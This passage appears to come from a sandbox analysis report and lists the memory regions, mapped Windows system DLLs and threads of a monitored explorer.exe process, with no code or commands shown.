entry_point = 0x7ffc27487a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 495 start_va = 0x7ffc27950000 end_va = 0x7ffc27a72fff monitored = 0 entry_point = 0x7ffc279ada30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 496 start_va = 0x7ffc27f70000 end_va = 0x7ffc2802cfff monitored = 0 entry_point = 0x7ffc27f87070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 497 start_va = 0x7ffc28030000 end_va = 0x7ffc28104fff monitored = 0 entry_point = 0x7ffc2804d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 498 start_va = 0x7ffc282b0000 end_va = 0x7ffc2834afff monitored = 0 entry_point = 0x7ffc282cc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 499 start_va = 0x7ffc28350000 end_va = 0x7ffc283fdfff monitored = 0 entry_point = 0x7ffc2838b940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 500 start_va = 0x7ffc28470000 end_va = 0x7ffc28517fff monitored = 0 entry_point = 0x7ffc2848d990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 501 start_va = 0x7ffc28610000 end_va = 0x7ffc28639fff monitored = 0 entry_point = 0x7ffc286148d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 502 start_va = 0x7ffc28e70000 end_va = 0x7ffc29063fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 507 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Thread: id = 9 os_tid = 0x169c Thread: id = 10 os_tid = 0xedc Thread: id = 11 os_tid = 0x814 Thread: id = 12 os_tid = 0xd68 Thread: id = 13 os_tid = 0x544 Thread: id = 14 os_tid = 0x73c Thread: id = 15 os_tid = 0x624 Thread: id = 16 os_tid = 0x17c0 Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x494b3000" os_pid = "0xa04" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001d295" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 519 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 520 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 521 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 522 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 523 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 524 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 525 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 526 start_va = 0x100000 end_va = 0x1c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 527 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 528 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 529 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 530 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 531 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 532 start_va = 0x410000 end_va = 0x411fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 533 start_va = 0x420000 end_va = 0x423fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 534 start_va = 0x430000 end_va = 0x444fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 535 start_va = 0x450000 end_va = 0x451fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 536 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 537 start_va = 0x490000 end_va = 0x497fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 538 start_va = 0x4a0000 end_va = 0x4a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 539 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 540 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 541 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 542 start_va = 0x4e0000 end_va = 0x4e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 543 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 544 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 545 start_va = 0x510000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 546 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 547 start_va = 0x620000 end_va = 0x633fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db") Region: id = 548 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 549 start_va = 0x650000 end_va = 0x661fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 550 start_va = 0x670000 end_va = 0x671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 551 start_va = 0x680000 end_va = 0x681fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 552 start_va = 0x690000 end_va = 0x691fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 553 start_va = 0x6a0000 end_va = 0x6aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 554 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 555 start_va = 0x6d0000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 556 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 557 start_va = 0x6f0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 558 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 559 start_va = 0xa80000 end_va = 0x1e80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 560 start_va = 0x1e90000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 561 start_va = 0x1f10000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 562 start_va = 0x1f90000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 563 start_va = 0x2010000 end_va = 0x2010fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 564 start_va = 0x2020000 end_va = 0x2021fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 565 start_va = 0x2030000 end_va = 0x2031fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002030000" filename = "" Region: id = 566 start_va = 0x2040000 end_va = 0x2041fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "twinui.pcshell.dll.mui" filename = "\\Windows\\System32\\en-US\\twinui.pcshell.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\twinui.pcshell.dll.mui") Region: id = 567 start_va = 0x2050000 end_va = 0x2053fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 568 start_va = 0x2060000 end_va = 0x2061fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002060000" filename = "" Region: id = 569 start_va = 0x2070000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 570 start_va = 0x2080000 end_va = 0x23b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 571 start_va = 0x23c0000 end_va = 0x23cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dsreg.dll.mui" filename = "\\Windows\\System32\\en-US\\dsreg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dsreg.dll.mui") Region: id = 572 start_va = 0x23d0000 end_va = 0x23d9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "combase.dll.mui" filename = "\\Windows\\System32\\en-US\\combase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\combase.dll.mui") Region: id = 573 start_va = 0x23e0000 end_va = 0x23e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023e0000" filename = "" Region: id = 574 start_va = 0x23f0000 end_va = 0x23f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 575 start_va = 0x2400000 end_va = 0x2402fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 576 start_va = 0x2410000 end_va = 0x2430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mun" filename = "\\Windows\\SystemResources\\stobject.dll.mun" (normalized: "c:\\windows\\systemresources\\stobject.dll.mun") Region: id = 577 start_va = 0x2440000 end_va = 0x2445fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 578 start_va = 0x2450000 end_va = 0x2451fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002450000" filename = "" Region: id = 579 start_va = 0x2460000 end_va = 0x246bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 580 start_va = 0x2480000 end_va = 0x2481fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 581 start_va = 0x2490000 end_va = 0x24a4fff monitored = 0 entry_point = 0x2492110 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 582 start_va = 0x24b0000 end_va = 0x24b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 583 start_va = 0x24c0000 end_va = 0x2520fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 584 start_va = 0x2530000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 585 start_va = 0x25b0000 end_va = 0x25b8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 586 start_va = 0x25c0000 end_va = 0x25c1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 587 start_va = 0x25d0000 end_va = 0x25d5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowszones.res" filename = "\\Windows\\Globalization\\ICU\\windowsZones.res" (normalized: "c:\\windows\\globalization\\icu\\windowszones.res") Region: id = 588 start_va = 0x25e0000 end_va = 0x25e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025e0000" filename = "" Region: id = 589 start_va = 0x25f0000 end_va = 0x25f3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "2222399582.pri" filename = "\\Windows\\rescache\\_merged\\1840795356\\2222399582.pri" (normalized: "c:\\windows\\rescache\\_merged\\1840795356\\2222399582.pri") Region: id = 590 start_va = 0x2610000 end_va = 0x2617fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 591 start_va = 0x2620000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 592 start_va = 0x26a0000 end_va = 0x26a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026a0000" filename = "" Region: id = 593 start_va = 0x26b0000 end_va = 0x26b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 594 start_va = 0x26c0000 end_va = 0x26c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026c0000" filename = "" Region: id = 595 start_va = 0x26d0000 end_va = 0x26d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 596 start_va = 0x26e0000 end_va = 0x26e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll.mui" filename = "\\Windows\\System32\\en-US\\oleaccrc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\oleaccrc.dll.mui") Region: id = 597 start_va = 0x26f0000 end_va = 0x27d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026f0000" filename = "" Region: id = 598 start_va = 0x27e0000 end_va = 0x27e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027e0000" filename = "" Region: id = 599 start_va = 0x27f0000 end_va = 0x27f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 600 start_va = 0x2800000 end_va = 0x2847fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 601 start_va = 0x2850000 end_va = 0x2861fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001d.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001d.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001d.db") Region: id = 602 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 603 start_va = 0x2890000 end_va = 0x2890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 604 start_va = 0x28a0000 end_va = 0x3afffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 605 start_va = 0x3b00000 end_va = 0x3b00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 606 start_va = 0x3b10000 end_va = 0x3c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b10000" filename = "" Region: id = 607 start_va = 0x3c10000 end_va = 0x3c10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 608 start_va = 0x3c20000 end_va = 0x3c2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c20000" filename = "" Region: id = 609 start_va = 0x3c30000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c30000" filename = "" Region: id = 610 start_va = 0x3c40000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c40000" filename = "" Region: id = 611 start_va = 0x3c50000 end_va = 0x3c50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 612 start_va = 0x3c60000 end_va = 0x3c60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c60000" filename = "" Region: id = 613 start_va = 0x3c70000 end_va = 0x3c70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c70000" filename = "" Region: id = 614 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c80000" filename = "" Region: id = 615 start_va = 0x3c90000 end_va = 0x3d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 616 start_va = 0x3d90000 end_va = 0x3d90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d90000" filename = "" Region: id = 617 start_va = 0x3da0000 end_va = 0x3da0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003da0000" filename = "" Region: id = 618 start_va = 0x3db0000 end_va = 0x3db3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 619 start_va = 0x3dc0000 end_va = 0x3e06fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dc0000" filename = "" Region: id = 620 start_va = 0x3e10000 end_va = 0x3e11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 621 start_va = 0x3e20000 end_va = 0x3e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 622 start_va = 0x3e30000 end_va = 0x3e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 623 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 624 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 625 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 626 start_va = 0x3ef0000 end_va = 0x3ef8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 627 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 628 start_va = 0x4000000 end_va = 0x4001fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004000000" filename = "" Region: id = 629 start_va = 0x4020000 end_va = 0x4020fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004020000" filename = "" Region: id = 630 start_va = 0x4030000 end_va = 0x4030fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 631 start_va = 0x4040000 end_va = 0x4040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 632 start_va = 0x4050000 end_va = 0x405ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004050000" filename = "" Region: id = 633 start_va = 0x4060000 end_va = 0x4060fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004060000" filename = "" Region: id = 634 start_va = 0x4080000 end_va = 0x4081fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004080000" filename = "" Region: id = 635 start_va = 0x4090000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 636 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 637 start_va = 0x4120000 end_va = 0x4120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004120000" filename = "" Region: id = 638 start_va = 0x4130000 end_va = 0x4130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 639 start_va = 0x4140000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 640 start_va = 0x41c0000 end_va = 0x423ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 641 start_va = 0x4240000 end_va = 0x4245fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 642 start_va = 0x4250000 end_va = 0x4254fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 643 start_va = 0x4260000 end_va = 0x4298fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004260000" filename = "" Region: id = 644 start_va = 0x42a0000 end_va = 0x431ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 645 start_va = 0x4320000 end_va = 0x432ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 646 start_va = 0x4330000 end_va = 0x4330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 647 start_va = 0x4340000 end_va = 0x4341fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 648 start_va = 0x4350000 end_va = 0x43cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 649 start_va = 0x43d0000 end_va = 0x43d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 650 start_va = 0x43e0000 end_va = 0x43e2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043e0000" filename = "" Region: id = 651 start_va = 0x4430000 end_va = 0x4431fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004430000" filename = "" Region: id = 652 start_va = 0x4440000 end_va = 0x4441fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004440000" filename = "" Region: id = 653 start_va = 0x4450000 end_va = 0x4451fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004450000" filename = "" Region: id = 654 start_va = 0x4460000 end_va = 0x4463fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 655 start_va = 0x4470000 end_va = 0x44b8fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db") Region: id = 656 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 657 start_va = 0x44d0000 end_va = 0x456bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 658 start_va = 0x4570000 end_va = 0x457ffff monitored = 0 entry_point 